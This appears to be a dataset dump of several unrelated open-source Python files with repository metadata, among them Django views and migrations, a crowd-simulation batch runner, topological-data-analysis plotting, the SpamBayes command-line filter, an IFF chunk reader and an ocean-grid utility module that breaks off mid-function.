64f9867794ce1730c12b0b60310dfcf9a7a39910 | c0093a13696fd7df81ae4e35bbfbe840d3c1ba42 | /pages/views.py | d278f0690d59836ed056f9fb2becdd9b6767e2ea | [] | no_license | Isaac3N/docker-hello | 471462cb0fe7f64c1ccafe464c43ea9415f56639 | 6eef23cf62a9aa62935848ef9faf6685f343d5ee | refs/heads/master | 2023-08-15T14:12:58.500883 | 2021-09-27T20:58:16 | 2021-09-27T20:58:16 | 410,943,011 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home_page_view(request):
return HttpResponse('Hello, World!') | [
"[email protected]"
] | |
051d123e789c4e85957c79b6a9586465d5c55a92 | ddd5314a6c4f6b299adf65b88d1547e387c67aea | /py/fm_config.py | 7591659307262a7f4c1b791381c3f19cf4edbfc7 | [
"Apache-2.0"
] | permissive | colinsongf/tensorflow_ffm | 4d5ac52ca1f4c9232c3adb3b8e41b31792f4cb01 | f2bcba26130df1bbd6f9a67da3b609e192bc341a | refs/heads/master | 2021-01-17T18:15:08.127839 | 2016-09-18T22:26:46 | 2016-09-18T22:26:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | class FmConfig:
def __init__(self):
self.batch_size = 10000
self.factor_num = 10
self.epoch_num = 5
self.init_value_range = 0.0001
self.factor_lambda = 1
self.bias_lambda = 1
self.vocabulary_size = 500000
self.thread_num = 2
self.train_file = ["./data/train.sample.txt"]
self.test_file = ["./data/test.sample.txt"] | [
"[email protected]"
] | |
2b196d0ecd4f96f2df0d827a47041689c7abca0e | fa21a32c71a6a68a612c66278b5efe353dc89eab | /automate_speeds.py | b6dffa09b63a5e299146c1df2b1f7af253c26e78 | [] | no_license | emorysmithis/ND-Crowd-Simulator | 8fb88ed5498667b1d0a283ad62fbf81ae7ac9dbb | 8a6e4019d68ceb7be9f8b51a7f64947ac5e868a5 | refs/heads/main | 2023-05-01T08:35:28.193664 | 2021-05-12T18:30:49 | 2021-05-12T18:30:49 | 350,157,800 | 0 | 0 | null | 2021-05-12T14:39:50 | 2021-03-22T00:33:19 | Python | UTF-8 | Python | false | false | 2,171 | py | #!/usr/bin/env python3
import os
import sys
import multiprocessing as mp
from datetime import datetime
def worker(input_list):
command = './simulation.py ' + ' '.join(input_list)
print(command)
os.system(command)
print(f'Finished: {command}')
if __name__ == '__main__':
# Get start time
time_start = datetime.now()
# Initialize variables
directories = sys.argv[1:]
days = ['m', 't', 'w', 'r', 'f']
processes = []
start = ''
end = ''
# Iterate through each directory
for d in directories:
# Get start_time and end_time
with open (d+'/time.txt', 'r') as f:
start = f.readline().strip()
end = f.readline().strip()
# Run simulation for each day of the week
for day in days:
input_file = d + '/' + day + '_students.txt'
# Run simulation for each combination of speeds
step = 10
for speed1 in range(30, 110, 10):
upper_limit = 100 - speed1 + 10
for speed2 in range(0, upper_limit, 10):
speed3 = 100 - speed1 - speed2
speed_arg = str(speed1) + '_' + str(speed2) + '_' + str(speed3)
output_file = d + '/speeds_batch/output_' + day + '_' + speed_arg + '.txt'
if not os.path.exists(d+'/speeds_batch'):
os.mkdir(d+'/speeds_batch')
process = mp.Process(target=worker, args=(['-s', input_file, '-start', start, '-end', end, '-n', '50', '-speed', speed_arg, '>', output_file],))
processes.append(process)
process.start()
for process in processes:
process.join()
intermediate_time = datetime.now() - time_start
print(f"Joined! Elapsed Time: {intermediate_time}, Time Now: {datetime.now()}")
processes = []
# Get end time
time_end = datetime.now()
tdelta = time_end - time_start
print('--------TIME--------')
print('start:', time_start)
print('end:', time_end)
print('timedelta:', tdelta)
| [
"cyoun@ndedu"
] | cyoun@ndedu |
464b5faef31e5fd150ec7d665f812f62d8541bb2 | 1fbeda7f33d243aaeff49fab66a748c30169803a | /OpenTDA/tda/plotting.py | 57042a80546bd319cb0d4ff61c6066cf2fe80e52 | [
"MIT",
"Apache-2.0"
] | permissive | iammosespaulr/TDA-tutorial | 5c37a46f352712f4a6f5122240fb7fb099a0cd02 | 657873e95a6f7024406c2c1f2ce58718220dcd66 | refs/heads/master | 2022-11-13T08:10:36.391940 | 2020-07-05T19:49:56 | 2020-07-05T19:49:56 | 267,326,719 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,601 | py | import matplotlib.pyplot as plt
def drawComplex(data, ph, axes=[-6, 8, -6, 6]):
plt.clf()
plt.axis(axes) # axes = [x1, x2, y1, y2]
plt.scatter(data[:, 0], data[:, 1]) # plotting just for clarity
for i, txt in enumerate(data):
plt.annotate(i, (data[i][0] + 0.05, data[i][1])) # add labels
# add lines for edges
for edge in [e for e in ph.ripsComplex if len(e) == 2]:
# print(edge)
pt1, pt2 = [data[pt] for pt in [n for n in edge]]
# plt.gca().add_line(plt.Line2D(pt1,pt2))
line = plt.Polygon([pt1, pt2], closed=None, fill=None, edgecolor='r')
plt.gca().add_line(line)
# add triangles
for triangle in [t for t in ph.ripsComplex if len(t) == 3]:
pt1, pt2, pt3 = [data[pt] for pt in [n for n in triangle]]
line = plt.Polygon([pt1, pt2, pt3], closed=False,
color="blue", alpha=0.3, fill=True, edgecolor=None)
plt.gca().add_line(line)
plt.show()
def graph_barcode(data, ph, homology_group=0):
persistence = ph.transform(data)
# this function just produces the barcode graph for each homology group
xstart = [s[1][0] for s in persistence if s[0] == homology_group]
xstop = [s[1][1] for s in persistence if s[0] == homology_group]
y = [0.1 * x + 0.1 for x in range(len(xstart))]
plt.hlines(y, xstart, xstop, color='b', lw=4)
# Setup the plot
ax = plt.gca()
plt.ylim(0, max(y) + 0.1)
ax.yaxis.set_major_formatter(plt.NullFormatter())
plt.xlabel('epsilon')
plt.ylabel("Betti dim %s" % (homology_group,))
plt.show()
| [
"[email protected]"
] | |
2188924ba0799b40255131ca820e033d736adf08 | 79e6603f79ffbb2721c8ecbdeed294ab3b23e3c7 | /authapp/migrations/0008_alter_shopuser_activation_key_expires.py | 47764f3ae2e87696a53cc0e84650970491d77726 | [] | no_license | MaksShI/Django_2 | 185ae4759bd90f627a0ad9ff39d690487f2c0b26 | 78f2ebdbfb047bc97eb8fd3acb6734dd856ea33f | refs/heads/main | 2023-07-13T09:51:50.804403 | 2021-08-13T08:53:20 | 2021-08-13T08:53:20 | 391,163,141 | 0 | 0 | null | 2021-08-24T11:49:57 | 2021-07-30T18:52:09 | Python | UTF-8 | Python | false | false | 537 | py | # Generated by Django 3.2.3 on 2021-08-03 14:18
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('authapp', '0007_alter_shopuser_activation_key_expires'),
]
operations = [
migrations.AlterField(
model_name='shopuser',
name='activation_key_expires',
field=models.DateTimeField(default=datetime.datetime(2021, 8, 5, 14, 18, 41, 273073, tzinfo=utc)),
),
]
| [
"[email protected]"
] | |
c51ffa2ab012e68f531724e0e4652c2150f831a5 | 55a273347cb103fe2b2704cb9653956956d0dd34 | /code/tmp_rtrip/chunk.py | dbe368c93d55a80a28e671121ea0264ecde55a31 | [
"MIT"
] | permissive | emilyemorehouse/ast-and-me | 4af1bc74fc967ea69ac1aed92664f6428acabe6a | 3f58117512e125e1ecbe3c72f2f0d26adb80b7b3 | refs/heads/master | 2022-11-18T03:50:36.505882 | 2018-05-12T17:53:44 | 2018-05-12T17:53:44 | 115,035,148 | 25 | 1 | MIT | 2022-11-04T11:36:43 | 2017-12-21T18:27:19 | Python | UTF-8 | Python | false | false | 5,303 | py | """Simple class to read IFF chunks.
An IFF chunk (used in formats such as AIFF, TIFF, RMFF (RealMedia File
Format)) has the following structure:
+----------------+
| ID (4 bytes) |
+----------------+
| size (4 bytes) |
+----------------+
| data |
| ... |
+----------------+
The ID is a 4-byte string which identifies the type of chunk.
The size field (a 32-bit value, encoded using big-endian byte order)
gives the size of the whole chunk, including the 8-byte header.
Usually an IFF-type file consists of one or more chunks. The proposed
usage of the Chunk class defined here is to instantiate an instance at
the start of each chunk and read from the instance until it reaches
the end, after which a new instance can be instantiated. At the end
of the file, creating a new instance will fail with an EOFError
exception.
Usage:
while True:
try:
chunk = Chunk(file)
except EOFError:
break
chunktype = chunk.getname()
while True:
data = chunk.read(nbytes)
if not data:
pass
# do something with data
The interface is file-like. The implemented methods are:
read, close, seek, tell, isatty.
Extra methods are: skip() (called by close, skips to the end of the chunk),
getname() (returns the name (ID) of the chunk)
The __init__ method has one required argument, a file-like object
(including a chunk instance), and one optional argument, a flag which
specifies whether or not chunks are aligned on 2-byte boundaries. The
default is 1, i.e. aligned.
"""
class Chunk:
def __init__(self, file, align=True, bigendian=True, inclheader=False):
import struct
self.closed = False
self.align = align
if bigendian:
strflag = '>'
else:
strflag = '<'
self.file = file
self.chunkname = file.read(4)
if len(self.chunkname) < 4:
raise EOFError
try:
self.chunksize = struct.unpack_from(strflag + 'L', file.read(4))[0]
except struct.error:
raise EOFError
if inclheader:
self.chunksize = self.chunksize - 8
self.size_read = 0
try:
self.offset = self.file.tell()
except (AttributeError, OSError):
self.seekable = False
else:
self.seekable = True
def getname(self):
"""Return the name (ID) of the current chunk."""
return self.chunkname
def getsize(self):
"""Return the size of the current chunk."""
return self.chunksize
def close(self):
if not self.closed:
try:
self.skip()
finally:
self.closed = True
def isatty(self):
if self.closed:
raise ValueError('I/O operation on closed file')
return False
def seek(self, pos, whence=0):
"""Seek to specified position into the chunk.
Default position is 0 (start of chunk).
If the file is not seekable, this will result in an error.
"""
if self.closed:
raise ValueError('I/O operation on closed file')
if not self.seekable:
raise OSError('cannot seek')
if whence == 1:
pos = pos + self.size_read
elif whence == 2:
pos = pos + self.chunksize
if pos < 0 or pos > self.chunksize:
raise RuntimeError
self.file.seek(self.offset + pos, 0)
self.size_read = pos
def tell(self):
if self.closed:
raise ValueError('I/O operation on closed file')
return self.size_read
def read(self, size=-1):
"""Read at most size bytes from the chunk.
If size is omitted or negative, read until the end
of the chunk.
"""
if self.closed:
raise ValueError('I/O operation on closed file')
if self.size_read >= self.chunksize:
return b''
if size < 0:
size = self.chunksize - self.size_read
if size > self.chunksize - self.size_read:
size = self.chunksize - self.size_read
data = self.file.read(size)
self.size_read = self.size_read + len(data)
if (self.size_read == self.chunksize and self.align and self.
chunksize & 1):
dummy = self.file.read(1)
self.size_read = self.size_read + len(dummy)
return data
def skip(self):
"""Skip the rest of the chunk.
If you are not interested in the contents of the chunk,
this method should be called so that the file points to
the start of the next chunk.
"""
if self.closed:
raise ValueError('I/O operation on closed file')
if self.seekable:
try:
n = self.chunksize - self.size_read
if self.align and self.chunksize & 1:
n = n + 1
self.file.seek(n, 1)
self.size_read = self.size_read + n
return
except OSError:
pass
while self.size_read < self.chunksize:
n = min(8192, self.chunksize - self.size_read)
dummy = self.read(n)
if not dummy:
raise EOFError
| [
"[email protected]"
] | |
6e9779222154c036199119c55cd1502ab2165523 | b42c827e57b6c24251dedf0894ba3a97eb876b7c | /sub_mod.py | c30c96e5c0f1c2426d4e872035dc146293871810 | [] | no_license | Aswin-Sureshumar/Python-Programs | 77f20bacefc32307b60a00e9345cae95dc14185f | 0387eb732e1b43995d161b5088b49b1155405411 | refs/heads/master | 2022-12-22T11:53:04.864017 | 2020-09-22T10:23:57 | 2020-09-22T10:23:57 | 283,938,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py | def sub(a,b):
c=a-b
print(c) | [
"[email protected]"
] | |
c620965011fd4bf19b37d00c6524872b433969c7 | 39d4504ec1da8975fac526d6801b94f4348b6b61 | /research/gan/mnist/conditional_eval_test.py | 178f7b1d87d644748c4bc0bdacae595263d7a2b3 | [
"Apache-2.0"
] | permissive | vincentcheny/models | fe0ff5888e6ee00a0d4fa5ee14154acdbeebe7ad | afb1a59fc1bc792ac72d1a3e22e2469020529788 | refs/heads/master | 2020-07-23T21:38:24.559521 | 2019-11-15T07:50:11 | 2019-11-15T07:50:11 | 207,712,649 | 1 | 0 | Apache-2.0 | 2019-09-11T03:12:31 | 2019-09-11T03:12:31 | null | UTF-8 | Python | false | false | 1,124 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tfgan.examples.mnist.conditional_eval."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import conditional_eval
class ConditionalEvalTest(absltest.TestCase):
def test_build_graph(self):
conditional_eval.main(None, run_eval_loop=False)
if __name__ == '__main__':
absltest.main()
| [
"[email protected]"
] | |
f90693fda41d7401e673b3cd156e04fc78d3b2d1 | 964c0732b647cde0aca6aa0388a0fd0f2c1fea11 | /code/proposed_model/nmf.py | 457c74ed82249dd63f1ba99d6d0631c488e5911b | [
"Apache-2.0"
] | permissive | levelupai/short_text_clustering | c97daf1dac3bbb26c5c2649b2b02e9c5a2344ed2 | d83f4f429890dd8d9d58e8cbdf7bace902c4ad6b | refs/heads/master | 2020-03-22T19:13:07.228547 | 2018-07-11T09:56:23 | 2018-07-11T09:56:23 | 140,513,759 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,345 | py | import pickle
import numpy
import random
lines = open('word_ids.py', 'r').readline()
word_to_id = eval(lines)
components = None
with open('components_dump.txt', 'br') as c:
components = pickle.load(c)
windows_sum = sum(components[0]) # windows
not_windows_sum = sum(components[1]) # not windows
# recall = probability of detecting 0 (windows) when it really is 0
# false positive rate = probability of detecting 0 (windows) when it really is 1
def get_score(filename, expected, threshold_val):
correct = 0
total = 0
unmatched = 0
true_positive = 0
true_negative = 0
false_positive = 0
false_negative = 0
with open(filename, 'r') as c:
lines = c.readlines()
for line in lines:
score_for_0 = 0.0
score_for_1 = 0.0
significant_words = 0
new_line = line.lower().strip().replace("\"", "")
words = new_line.split(" ")
for word in words:
if word in word_to_id:
if components[0][word_to_id[word]] > threshold_val or components[1][word_to_id[word]] > threshold_val:
score_for_0 += (components[0][word_to_id[word]] / windows_sum)
score_for_1 += (components[1][word_to_id[word]] / not_windows_sum)
significant_words += 1
#print(word)
if score_for_0 == score_for_1:
final_category = "Undecided"
unmatched += 1
score_for_0 += random.randint(1,100000)
score_for_1 += random.randint(1,100000)
#false_positive += 0.5
#true_positive += 0.5
#false_positive += 1
#false_negative += 1
elif score_for_0 > score_for_1:
final_category = "0"
if expected == 0:
correct += 1
true_positive += 1
else:
false_positive += 1
else:
final_category = "1"
if expected == 1:
correct += 1
true_negative += 1
else:
false_negative += 1
#print("%s, sig words: %s, 0: %s, 1: %s, final category: %s" % (line, significant_words, score_for_0, score_for_1, final_category))
total += 1
incorrect = total - correct - unmatched
# correct is true positive rate
return [correct, incorrect, total, unmatched, true_positive, true_negative, false_positive, false_negative]
not_windows_correct_rate = []
windows_correct_rate = []
total_size = 0
csvfile = open('roc.csv', 'w+')
for threshold in range(0, 101):
scaled_threshold = threshold / 10.0
correct, incorrect, total, unmatched, true_positive, true_negative, false_positive, false_negative = get_score('../windows/out_non_random100.csv', 1, scaled_threshold)
correct2, incorrect2, total2, unmatched2, true_positive2, true_negative2, false_positive2, false_negative2 = get_score('../windows/out_random100.csv', 0, scaled_threshold)
#print("windows", correct, incorrect, total, unmatched)
csvfile.write('%s,%s,%s,%s,%s\n' % (scaled_threshold, total, unmatched, false_positive / total, true_positive2 / (total2)))
csvfile.flush()
csvfile.close()
| [
"[email protected]"
] | |
39edc3c8c2848e87569b806d2de9143a305761da | dc7dc1ab85403a4467044d4c0c936c17fff5225a | /fstmerge/examples/SpamBayes/rev3103-3133/spambayes/scripts/sb_filter.py | a91dff7fc51be65830e018aa17a5c5e3f14b2bd7 | [] | no_license | RoDaniel/featurehouse | d2dcb5f896bbce2c5154d0ba5622a908db4c5d99 | df89ce54ddadfba742508aa2ff3ba919a4a598dc | refs/heads/master | 2020-12-25T13:45:44.511719 | 2012-01-20T17:43:15 | 2012-01-20T17:43:15 | 1,919,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,846 | py | """Usage: %(program)s [options] [filenames]
Options can one or more of:
-h
show usage and exit
-v
show version and exit
-x
show some usage examples and exit
-d DBFILE
use database in DBFILE
-p PICKLEFILE
use pickle (instead of database) in PICKLEFILE
-n
create a new database
* -f
filter (default if no processing options are given)
* -g
(re)train as a good (ham) message
* -s
(re)train as a bad (spam) message
* -t
filter and train based on the result -- you must
make sure to untrain all mistakes later. Not recommended.
* -G
untrain ham (only use if you've already trained this message)
* -S
untrain spam (only use if you've already trained this message)
-o section:option:value
set [section, option] in the options database to value
-P
Run under control of the Python profiler, if it is available
All options marked with '*' operate on stdin, and write the resultant
message to stdout.
If no filenames are given on the command line, standard input will be
processed as a single message. If one or more filenames are given on the
command line, each will be processed according to the following rules:
* If the filename is '-', standard input will be processed as a single
message (may only be usefully given once).
* If the filename starts with '+' it will be processed as an MH folder.
* If the filename is a directory and it contains a subdirectory named
'cur', it will be processed as a Maildir.
* If the filename is a directory and it contains a subdirectory named
'Mail', it will be processed as an MH Mailbox.
* If the filename is a directory and not a Maildir nor an MH Mailbox, it
will be processed as a Mailbox directory consisting of just .txt and
.lorien files.
* Otherwise, the filename is treated as a Unix-style mailbox (messages
begin on a line starting with 'From ').
Output is always to standard output as a Unix-style mailbox.
"""
import os
import sys
import getopt
from spambayes import hammie, Options, mboxutils, storage
from spambayes.Version import get_current_version
try:
True, False
except NameError:
True, False = 1, 0
program = sys.argv[0]
example_doc = """_Examples_
filter a message on disk:
%(program)s < message
(re)train a message as ham:
%(program)s -g < message
(re)train a message as spam:
%(program)s -s < message
procmail recipe to filter and train in one step:
:0 fw
| %(program)s -t
mutt configuration: This binds the 'H' key to retrain the message as
ham, and prompt for a folder to move it to. The 'S' key retrains as
spam, and moves to a 'spam' folder. See contrib/muttrc in the spambayes
distribution for other neat mutt tricks.
macro index S "|sb_filter.py -s | procmail\n"
macro pager S "|sb_filter.py -s | procmail\n"
macro index H "|sb_filter.py -g | procmail\n"
macro pager H "|sb_filter.py -g | procmail\n"
color index red black "~h 'X-Spambayes-Disposition: spam' ~F"
"""
def examples():
print example_doc % globals()
sys.exit(0)
def usage(code, msg=''):
"""Print usage message and sys.exit(code)."""
v = get_current_version()
print >> sys.stderr, v.get_long_version("SpamBayes Command Line Filter")
print >> sys.stderr
if msg:
print >> sys.stderr, msg
print >> sys.stderr
print >> sys.stderr, __doc__ % globals()
sys.exit(code)
def version():
v = get_current_version()
print >> sys.stderr, v.get_long_version("SpamBayes Command Line Filter")
sys.exit(0)
class HammieFilter (object) :
def __init__(self):
options = Options.options
if options["Storage", "persistent_storage_file"] == \
options.default("Storage", "persistent_storage_file"):
options["Storage", "persistent_storage_file"] = \
"~/.hammiedb"
options.merge_files(['/etc/hammierc',
os.path.expanduser('~/.hammierc')])
self.dbname, self.usedb = storage.database_type([])
self.mode = self.h = None
def open(self, mode):
if self.h is None or self.mode != mode:
if self.h is not None:
if self.mode != 'r':
self.h.store()
self.h.close()
self.mode = mode
self.h = hammie.open(self.dbname, self.usedb, self.mode)
def close(self):
if self.h is not None:
if self.mode != 'r':
self.h.store()
self.h.close()
self.h = None
__del__ = close
def newdb(self):
self.open('n')
self.close()
def filter(self, msg):
if Options.options["Hammie", "train_on_filter"]:
self.open('c')
else:
self.open('r')
return self.h.filter(msg)
def filter_train(self, msg):
self.open('c')
return self.h.filter(msg, train=True)
def train_ham(self, msg):
self.open('c')
self.h.train_ham(msg, Options.options["Headers", "include_trained"])
self.h.store()
def train_spam(self, msg):
self.open('c')
self.h.train_spam(msg, Options.options["Headers", "include_trained"])
self.h.store()
def untrain_ham(self, msg):
self.open('c')
self.h.untrain_ham(msg)
self.h.store()
def untrain_spam(self, msg):
self.open('c')
self.h.untrain_spam(msg)
self.h.store()
def main(profiling=False):
h = HammieFilter()
actions = []
opts, args = getopt.getopt(sys.argv[1:], 'hvxd:p:nfgstGSo:P',
['help', 'version', 'examples', 'option='])
create_newdb = False
do_profile = False
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-v', '--version'):
version()
elif opt in ('-x', '--examples'):
examples()
elif opt in ('-o', '--option'):
Options.options.set_from_cmdline(arg, sys.stderr)
elif opt == '-f':
actions.append(h.filter)
elif opt == '-g':
actions.append(h.train_ham)
elif opt == '-s':
actions.append(h.train_spam)
elif opt == '-t':
actions.append(h.filter_train)
elif opt == '-G':
actions.append(h.untrain_ham)
elif opt == '-S':
actions.append(h.untrain_spam)
elif opt == '-P':
do_profile = True
if not profiling:
try:
import cProfile
except ImportError:
pass
else:
return cProfile.run("main(True)")
elif opt == "-n":
create_newdb = True
h.dbname, h.usedb = storage.database_type(opts)
if create_newdb or not os.path.exists(h.dbname):
h.newdb()
print >> sys.stderr, "Created new database in", h.dbname
if create_newdb:
sys.exit(0)
if actions == []:
actions = [h.filter]
if not args:
args = ["-"]
for fname in args:
mbox = mboxutils.getmbox(fname)
for msg in mbox:
for action in actions:
action(msg)
if args == ["-"]:
unixfrom = msg.get_unixfrom() is not None
else:
unixfrom = True
result = mboxutils.as_string(msg, unixfrom=unixfrom)
sys.stdout.write(result)
if __name__ == "__main__":
main()
if __name__ == "__main__":
main()
try:
True, False
except NameError:
True, False = 1, 0
| [
"joliebig"
] | joliebig |
6f3af3a3f0b28b4263897e9c29037aa864e04765 | 5f226f0fa3251d69e7e1e51362f9fee3c66e2090 | /mediacenterRecommend/mediacenterRecommend/wsgi.py | d5a8553b625e7f18927f29babd3f2f7e40c96673 | [] | no_license | nekketsu2010/mediacenterRecommend | f592a36447c10ac11118b51e1c63ba7478924f5a | d69c79be3644e33e9ae71702ff094a939df7f638 | refs/heads/master | 2020-04-11T12:25:25.708479 | 2018-12-14T12:06:26 | 2018-12-14T12:06:26 | 161,779,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | """
WSGI config for mediacenterRecommend project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mediacenterRecommend.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
2b680068fcd0bf94c0332516bfbc1916dd2a4a49 | 3b6bf73a68b77f330d0ffb01d3e5e8fe11a89c30 | /common-lib/GriddedData.py | f9f307fe4d73c6da6f23e3aed5a7d6ab843a9fd6 | [] | no_license | auraoupa/diags-CMEMS-on-occigen | 37e47fb5b663c09c6eeb7c04e0d423b72318d09e | 01f9d3f9d0d20bbcecd8adfcc23f866453133c94 | refs/heads/master | 2022-03-30T18:40:49.259651 | 2020-02-19T15:15:26 | 2020-02-19T15:15:26 | 217,243,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,881 | py | #!/usr/bin/env python
#=======================================================================
"""GriddedData.py
Define grid object and interpolation tools for working with gridded data.
Some basic plotting facility is also provided.
"""
#=======================================================================
import numpy
import numpy as npy
N = npy
np = npy
import numpy.ma as ma
import os
os.environ['PROJ_LIB'] = '/home/albert/anaconda2/envs/lupa-py3/share/proj'
dint = npy.int8
dfloat = npy.float32
grav = 9.81 # acceleration due to gravity (m.s-2)
omega = 7.292115083046061e-5 # earth rotation rate (s-1)
earthrad = 6371229 # mean earth radius (m)
deg2rad = npy.pi / 180.
mod360 = lambda x: npy.mod(x+180,360)-180
#========================= Grid Class ===================================
class grid2D:
"""Two-dimensional grid object with the associated operators.
This class is based on NEMO ocean model notations and operators.
"""
def __init__(self,navlat=None,navlon=None,mask=None):
"""Initialize grid object from navlon,navlat arrays
"""
if (len(navlat.shape)==1 and len(navlon.shape)==1) or (navlon.shape!=navlat.shape):
navlon, navlat = npy.meshgrid(navlon,navlat)
#
self.navlon = navlon
self.navlat = navlat
self.tmask = mask
self.jpj,self.jpi = navlon.shape
self.jpk = 1
self.depthT = [0]
self.shape = (self.jpj,self.jpi)
self._get_gphiglam()
self._get_scalefactors()
self._get_masks()
self._get_surf()
def _get_gphiglam(self):
"""Get glam*,gphi* for * in t,u,v,f
"""
self.glamt = self.navlon
self.gphit = self.navlat
self.glamu = (self.glamt + npy.roll(self.glamt,-1,axis=-1))/2.
self.gphiu = (self.gphit + npy.roll(self.gphit,-1,axis=-1))/2.
self.glamv = (self.glamt + npy.roll(self.glamt,-1,axis=-2))/2.
self.gphiv = (self.gphit + npy.roll(self.gphit,-1,axis=-2))/2.
self.glamf = (self.glamu + npy.roll(self.glamu,-1,axis=-2))/2.
self.gphif = (self.gphiu + npy.roll(self.gphiu,-1,axis=-2))/2.
def _get_scalefactors(self,method='1'):
"""Get the scale factors (m) : e1*,e2* for * in t,u,v,f
"""
for gtype in ['t','u','v','f']:
lam = eval('self.glam' + gtype)
phi = eval('self.gphi' + gtype)
djlam,dilam = npy.gradient(lam)
djphi,diphi = npy.gradient(phi)
e1 = earthrad * deg2rad * npy.sqrt( (dilam * npy.cos(deg2rad * phi))**2. + diphi**2.)
e2 = earthrad * deg2rad * npy.sqrt( (djlam * npy.cos(deg2rad*phi))**2. + djphi**2.)
exec('self.e1' + gtype + ' = e1')
exec('self.e2' + gtype + ' = e2')
def _get_masks(self):
"""Get t,u,v,f-masks
"""
if (self.tmask is None):
self.tmask = npy.ones(self.shape,dtype=dint)
self.umask = self.tmask
self.vmask = self.tmask
self.fmask = self.tmask
else:
jpj,jpi = self.shape
self.tmask = npy.array(self.tmask,dtype=dint)
bigtmask = npy.ones((jpj+1,jpi+1),dtype=dint)
bigtmask[0:jpj,0:jpi] = self.tmask
self.umask= bigtmask[0:jpj,0:jpi] * bigtmask[0:jpj,1:jpi+1]
self.vmask= bigtmask[0:jpj,0:jpi] * bigtmask[1:jpj+1,0:jpi]
self.fmask= bigtmask[0:jpj,0:jpi] * bigtmask[0:jpj,1:jpi+1]\
* bigtmask[1:jpj+1,0:jpi] * bigtmask[1:jpj+1,1:jpi+1]
def _get_surf(self):
"""Compute array surfaces.
"""
self.u_surf = self.e2u * self.e1u
self.v_surf = self.e2v * self.e1v
self.f_surf = self.e2f * self.e1f
self.t_surf = self.e2t * self.e1t
self.surface = npy.sum(npy.sum(self.tmask * self.t_surf,axis=-1),axis=-1)
def _get_corio(self):
"""Compute coriolis parameter on the grid
"""
coriogrid = 'corio_' + grid
for grid in ['u','v','t']:
coriogrid = 'corio_' + grid
if not(hasattr(self,coriogrid)):
exec('self.' + coriogrid + '= corio(self,grid=grid)')
#---------------------------- Masking ---------------------------------------
def set_mask(self,nq,mask,msk_value=1.E20):
"""Set a mask on an array.
"""
if ma.isMaskedArray(nq):
nq=npy.array(nq,subok=True)
q = nan_to_zero(nq)
a_msk = abs(mask-1)
a_msk = a_msk * msk_value
mq = q * mask
mq+= a_msk
#
return mq
#---------------------------- Grid Swapping ---------------------------------
#- Core swapping utilities
def _gridi2iplus(self,var,mvol):
jpi = self.jpi
mvar = mvol
tabvar = 0.*var#npy.core.ma.masked_equal(0.*var,1)
# newval(i) is (val(i) + val(i+1)) / 2
tabvar[...,0:jpi-1] = mvar[...,0:jpi-1] * var[...,0:jpi-1]\
+ mvar[...,1:jpi] * var[...,1:jpi]
tabvar[...,0:jpi-1]/= mvar[...,0:jpi-1] + mvar[...,1:jpi]
tabvar[...,jpi-1] = var[...,jpi-1]
#
return nan_to_mskval(npy.array(tabvar,subok=True))
def _gridi2iminus(self,var,mvol):
jpi = self.jpi
mvar = mvol
tabvar = 0.*var#npy.core.ma.masked_equal(0.*var,1)
# newval(i) is (val(i-1) + val(i)) / 2
tabvar[...,:,1:jpi] = mvar[...,:,0:jpi-1] * var[...,:,0:jpi-1]\
+ mvar[...,:,1:jpi] * var[...,:,1:jpi]
tabvar[...,1:jpi]/= mvar[...,0:jpi-1] + mvar[...,1:jpi]
tabvar[...,0] = var[...,0]
#
return nan_to_mskval(npy.array(tabvar,subok=True))
def _gridj2jplus(self,var,mvol):
jpj = self.jpj
mvar = mvol
tabvar = 0.*var#npy.core.ma.masked_equal(0.*var,1)
# newval(j) is (val(j) + val(j+1)) / 2
tabvar[...,0:jpj-1,:] = mvar[...,0:jpj-1,:] * var[...,0:jpj-1,:]\
+ mvar[...,1:jpj,:] * var[...,1:jpj,:]
tabvar[...,0:jpj-1,:]/= mvar[...,0:jpj-1,:] + mvar[...,1:jpj,:]
tabvar[...,jpj-1,:] = var[...,jpj-1,:]
return nan_to_mskval(npy.array(tabvar,subok=True))
def _gridj2jminus(self,var,mvol):
jpj = self.jpj
mvar = mvol
tabvar = 0.*var#npy.core.ma.masked_equal(0*var,1)
# newval(j) is (val(j-1) + val(j)) / 2
tabvar[...,1:jpj,:] = mvar[...,0:jpj-1,:] * var[...,0:jpj-1,:]\
+ mvar[...,1:jpj,:] * var[...,1:jpj,:]
tabvar[...,1:jpj,:]/= mvar[...,0:jpj-1,:] + mvar[...,1:jpj,:]
tabvar[...,0,:] = var[...,0,:]
return nan_to_mskval(npy.array(tabvar,subok=True))
def _grid_2_grid_iright_jleft(self,var,mvol,mask):
var1 = self._gridi2iplus(var,mvol)
mvol1 = self._gridi2iplus(mvol,mask)
var2 = self._gridj2jminus(var1,mvol1)
return var2
def _grid_2_grid_ileft_jright(self,var,mvol,mask):
var1 = self._gridi2iminus(var,mvol)
mvol1 = self._gridi2iminus(mvol,mask)
var2 = self._gridj2jplus(var1,mvol1)
return var2
#- User swapping utilities
def gridf_2_gridT(self,w):
"""Return w (gridf) on gridT
"""
mvol = self.f_surf
msk = self.fmask
